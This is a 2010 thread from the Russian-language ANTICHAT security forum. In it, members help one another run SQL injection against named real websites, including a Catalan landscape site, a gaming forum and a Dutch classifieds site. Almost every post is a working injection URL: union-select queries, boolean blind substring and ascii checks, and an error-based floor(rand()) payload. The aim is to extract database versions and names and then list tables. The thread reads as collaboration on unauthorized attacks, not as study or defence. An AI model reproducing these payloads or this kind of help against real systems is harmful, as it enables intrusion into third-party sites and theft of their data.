ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.07.2010, 16:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
2597
Репутация:
0
|
|
Почему не показывают версии?
http://www.catpaisatge.net/dossiers/jardins/eng/jardins_historics.php?idZona=244%29%20union%20sEle ct%20version%28%29+--+
|
|
|
|
15.07.2010, 16:56
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от happygirl
happygirl said:
Почему не показывают версии?
http://www.catpaisatge.net/dossiers/jardins/eng/jardins_historics.php?idZona=244%29%20union%20sEle ct%20version%28%29+--+
http://www.catpaisatge.net/dossiers/jardins/eng/premsa2.php?idReg=-3307+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19
|
|
|
15.07.2010, 18:10
|
|
Новичок
Регистрация: 12.03.2010
Сообщений: 7
Провел на форуме:
38329
Репутация:
0
|
|
URL уязвима
http://forums.gamesquad.com/wfhq-ld-ladder-games.php?ld=on&ladder=The+Operational+Art+of+War+ %28TOAW%29&viewuser=1086
не может рассчитывать колонны
|
|
|
|
15.07.2010, 19:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345
Репутация:
573
|
|
Сообщение от Konqi
Konqi said:
там нету уязвимости, это просто синтаксическая ошибка
Лучше не вводи в заблуждение народ, если не знаешь. Есть там инъект.
Код:
Code:
http://forums.gamesquad.com/wfhq-ld-ladder-games.php?ld=on&ladder=The+Operational+Art+of+War+%28TOAW%29&viewuser=1086%0AaNd%0ASuBsTrInG(version(),1,1)=5#
ошибка выводится
Код:
Code:
http://forums.gamesquad.com/wfhq-ld-ladder-games.php?ld=on&ladder=The+Operational+Art+of+War+%28TOAW%29&viewuser=1086%0AaNd%0ASuBsTrInG(version(),1,1)=777#
Ошибки нет
|
|
|
|
15.07.2010, 19:58
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме:
52455
Репутация:
18
|
|
Помогите раскрутить скулю.
http://banken.ruilen.nl/random.php?catid=473+union+select+version()--+
а вот database() уже не показывает почему то.Пишет Unknown column 'admin_ruilen' in 'where clause' Вывод обрезанный, вроде четвертая версия.
Буду рад любым примерам, т.к. опыта маловато...
Вывод в ошибке.
|
|
|
|
15.07.2010, 20:03
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от auth_root
auth_root said:
Помогите раскрутить скулю.
http://banken.ruilen.nl/random.php?catid=473+union+select+version()--+
а вот database() уже не показывает почему то.Пишет Unknown column 'admin_ruilen' in 'where clause' Вывод обрезанный, вроде четвертая версия.
Буду рад любым примерам, т.к. опыта маловато...
http://banken.ruilen.nl/random.php?catid=473+and+substring(database(),1,1) =char(65)
и так далее
|
|
|
|
15.07.2010, 20:12
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме:
52455
Репутация:
18
|
|
Сообщение от Konqi
Konqi said:
http://banken.ruilen.nl/random.php?catid=473+and+substring(database(),1,1) =char(65)
и так далее
Версия пятая
http://banken.ruilen.nl/random.php?catid=473+and+ascii(lower(substring(ver sion(),1,1)))=53--+
зачем юзать подзапросы, есть же вывод... Я так месяц буду перебирать =(
Мне бы получить таблицы и колонки с information_schema.tables/columns раз версия пятая. а я чет не могу =\
|
|
|
|
15.07.2010, 20:56
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345
Репутация:
573
|
|
Есть вывод ошибки. Зачем посимвольно?
Код:
Code:
http://banken.ruilen.nl/random.php?catid=473+and+row(1,1)%3E(select%20count(*),concat(version(),0x3a,floor(rand()*2))+x+from+(select+1+union+select+2)a+group+by+x+limit+1)#
|
|
|
|
15.07.2010, 21:06
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от The matrix
The matrix said:
Есть вывод ошибки. Зачем посимвольно?
это просто один из методов
|
|
|
|
15.07.2010, 21:21
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345
Репутация:
573
|
|
Сообщение от Konqi
Konqi said:
это просто один из методов
Разумеется один из методов.
Ты предпочитаешь использовать не оптимальные и медленные способы? Чем оптимальные и быстрые, которые хотят видеть просящие помочь? 0_о
Это все равно, что пить воду с помощью вилки(медленно, но все же один из способов).
Пойду коньяка жахну с горя.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
